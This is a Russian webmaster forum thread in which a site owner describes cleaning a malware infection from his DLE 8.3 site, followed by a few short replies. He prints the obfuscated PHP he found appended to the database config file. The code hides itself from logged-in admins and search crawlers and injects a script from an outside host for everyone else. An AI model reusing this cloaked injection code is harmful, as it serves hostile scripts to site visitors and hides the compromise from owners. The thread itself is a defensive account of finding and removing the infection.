Бесплатно Вирусы на DLE

Тема в разделе "Домен, хостинг, администрирование", создана пользователем Hermanicus, 22 апр 2017.

1. Сколько я не работал с разными движками – DLE остается самым дырявым корытом, в которое постоянно сливают помои в виде вирусов. Ни одна дыра, так другая. Ни другая – так третья. Постоянно приходится обновляться и следить за тем, чтобы на сайтах не появилось новых ссылок, заключенных в display: none. Этот геморрой уже порядком надоел и вместо того, чтобы развивать сайты, приходится по полдня выяснять, где же эта сука (вирус) засела.

Вот и сегодня приключился казус. Просыпаюсь как обычно утром, часов эдак в 2. Завтракаю и захожу в панель вебмастера от Яндекса, чтобы глянуть на сайты. Параллельно вижу по статистике посещаемости, что трафик на одном из сайтов идет на уровне “-500″, по сравнению с прошлым днем. Тревожный звонок, ага. Это как тёща, которая звонит и говорит, что все дела по дому у себя сделала и думает чем бы ей заняться. Припрётся, точно. Итак, захожу в панель – и вижу напротив сайта значок, похожий на знак радиационной угрозы, только красный. Такой меткой Яндекс помечает сайты, зараженные вирусом, а в выдаче мы можем наблюдать “Этот сайт может нанести вред вашему компьютеру”.

Я почти не удивился, DLE же. Полез искать заразу. Так как я был залогинен админом на сайте, то исходный код был чистым. Вирус не показывался тем, кто заходит под своим аккаунтом на сайт. Зато для гостей был виден кусок кода, сразу перед html. Выглядит оно так:

Код:
    <script language=”JavaScript” charset=”windows-1251″ rel=”nofollow” src=”http://js-ghost.net/gate.php?id=666″></script>
    Начал искать в шаблонах этот код – нету. Перерыл все файлы на сервере, дата изменения которых была относительно свежей. Хрен там. Часа 2 потратил на то, чтобы найти информацию по этой строчке. Яша и гугл почти ничего не сказали. Только локальные случаи, на которых никто не мог найти решения. Слил весь сайт себе на жесткий, стал искать разные варианты адреса – тоже хрен. Глупо было надеяться, что этот код будет лежать в файле в открытом виде. Было бы слишком просто.

Потом начал искать общую инфу по вирусам в DLE и смотреть, куда они обычно прописывают себя. И, аллилуйя, добрался до файла engine/data/dbconfig.php (конфигурационный файл базы данных), где в конце был вписан код:

Код:
    $GLOBALS['_gro_']=Array(base64_decode(‘cHJlZ19tYXR’ .’ja’ .’A==’),base64_decode(‘cHJl’ .’Z19tYXRj’ .’aA=’ .’='),base64_decode(‘cHJlZ19′ .’tY’ .’XRjaA==’)); ?><? function gro($i){$a=Array(‘ZGxlX3Bhc3N3b3Jk’,'L3lhbmRleC9p’,'SFRUUF9VU0VSX0FHRU5U’,'L2dvb2dsZS9p’,'SFRUUF9

VU0VSX0FHRU5U’,'L2JvdC9p’,'SFRUUF9VU0VSX0FHRU5U’,'PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNj cmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly9qcy1naG

9zdC5uZXQvZ2F0ZS5waHA/aWQ9NjY2Ij48L3NjcmlwdD4=’);return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[gro(0)]))and(!$GLOBALS['_gro_'][0](gro(1),$_SERVER[gro(2)]))and(!$GLOBALS['_gro_'][1](gro(3),$_SERVER[gro(4)]))and(!$GLOBALS['_gro_'][2](gro(5),$_SERVER[gro(6)]))){echo gro(7);}
    Эта зараза как раз и давала такой эффект. Причем дата изменения файла была древней и поэтому я не обращал на это внимания. Позже в админке обнаружился второй админ, который появился на сайте неделю назад. Удалил его и переименовал файл admin.php, чтобы ворота у сайта не были так явно открыты.

Можно было обновить версию движка (у меня стоит 8.3), но было влом, поэтому потратил куеву тучу времени на поиск этой заразы. Надеюсь, я не один такой раздолбай с дыркой в DLE и эта инфа пригодится еще кому-нибудь :) трулала…

2. Полезная инфа, + поставлю )

3. Благодарю, годная информация. Ещё нужно скачивать Нулл версии с проверенных источниках.
    Любите котят и они Вас будут любить!

4. На дле частая проблема по-моему с вирусами.

5. Без обид, в данной ситуации сам виноват. Если сайты держишь на своих серверах, а не на обычном хостинге за 100р, то найти измененый файл дело одной минуты. Поспорю по поводу дырявости DLE, в 8 версии действительно были сильные уязвимости, если память не изменяет это было лет 6-7 назад, я думаю пора бы переходить на более новые версии. Небольшой совет на будущее, на dbconfig выставляй права 444.

Поделиться этой страницей